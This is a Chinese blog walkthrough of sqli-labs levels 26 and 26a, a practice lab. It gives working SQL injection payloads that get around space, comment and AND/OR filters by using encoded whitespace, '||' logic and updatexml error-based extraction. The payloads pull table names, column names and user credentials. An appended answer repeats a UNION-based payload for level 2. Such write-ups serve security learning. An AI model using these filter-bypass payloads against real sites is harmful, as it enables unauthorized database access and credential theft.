sqli-labs第二十六二十六a关

这关油条加你的可以试试linux搭建sqlilabs这样比较简单。

需要注意的

本关可能有的朋友在 windows 下无法使用一些特殊的字符代替空格,此处是因为 apache 的解析的问题,这里请更换到 linux 平台下。

本关结合 25 关,将空格,or,and,/*,#,--,/等各种符号过滤,此处对于 and,or 的处理方法不再赘述,参考 25.此处我们需要说明两方面:对于注释和结尾字符的我们此处只能利用构造一个 ’ 来闭合后面到 ’ ;对于空格,有较多的方法:

  • %09 TAB 键(水平)

  • %0a 新建一行

  • %0c 新的一页

  • %0d return 功能

  • %0b TAB 键(垂直)

  • %a0 空

Less-26(GET - Error based - All your SPACES and COMMENTS belong to us)

手工注入

这里我就用windows来完成了,使用的是报错注入。

?id=1'--+
?id=1'#
?id=1' OR 1 = 1--+
?id=1' AND 1 = 1--+
?id=1'/*
?id=1'/
?id=1'\

这些全部被过滤了。

但是单引号没有过滤,下面能清晰看到单引号的存在。

看来我们只能利用逻辑来绕过了。

?id=-1' || 1 = 1  || '

查询数据库名

?id=-1' || updatexml(1,concat(0x7e,database()),1) || '1'='1

查询表名

?id=1' || updatexml(1, concat(0x7e, (SELECT (group_concat(table_name)) FROM (infoorrmation_schema.tables) WHERE (table_schema=database()))) ,1) || '1'='1

查询列名

?id=1'||updatexml(1,concat(1,(SELECT (group_concat(column_name)) FROM (infoorrmation_schema.columns) WHERE (table_schema='security' %26%26 table_name = 'users'))) ,1) || '1'='1

查询数据

?id=-1' || updatexml(1,concat(0x0a,(SELECT(group_concat(concat_ws(0x3a,username,passwoorrd))) FROM (security.users) WHERE (id = 1) ))  ,1) || '1'='1

这次能查到数据。

自动化脚本注入工具

和之前是一样的

(2条消息) sqli-labs第一二关_himobrinehacken的博客-CSDN博客

Less-26a(GET - Error based - All your SPACES and COMMENTS belong to us - string single quuotes - Parenthrsis)

手工注入

和上一关一样,只是做了注释报错的操作,可以当成盲注解决。

(2条消息) sqli-labs第五六关_himobrinehacken的博客-CSDN博客

自动化脚本注入

和上一关一样

(2条消息) sqli-labs第一二关_himobrinehacken的博客-CSDN博客
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
回答: SQLI-LABS第二是一个显错注入的数字型不闭合的挑战。在这个挑战中,通过分析后端PHP源码,我们可以看到核心语句是`$sql="SELECT * FROM users WHERE id= $id ;`。与前一相比,这里的闭合方式不同,没有使用单引号将$id包围起来。\[1\] 为了获取users表的列名,我们可以使用注入语句`?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'`。这个语句利用了UNION操作符和information_schema表来获取列名。\[2\] 通过判断报错信息,我们可以初步确定存在注入点,并且判断出注入点类型为数字型注入。我们还可以猜测出当前表中的列数为3,并确定数据显示位置为2和3。进一步进行信息收集,我们可以得到数据库名为security,数据库版本为5.7.26,操作系统版本为Win64,数据库用户名为root@localhost,数据库路径为E:\site\phpStudy_64\phpstudy_pro\Extensions\MySQL5.7.26\data\。通过指定数据库,我们可以获取库中的表名,得到的表名为emails、referers、uagents和users。然后,通过指定表,我们可以获取表中的列名,得到的列名为id、username和password。最终,我们可以获取到username和password的数据。\[3\] 希望以上信息对你有所帮助! #### 引用[.reference_title] - *1* [SQLI-LABS 02.第二 【显错注入_数字型不闭合】](https://blog.csdn.net/weixin_45284414/article/details/130685057)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [sqli-labs第二](https://blog.csdn.net/weixin_45633277/article/details/122371405)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [sqli-labs----第二](https://blog.csdn.net/wyzhxhn/article/details/127700962)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值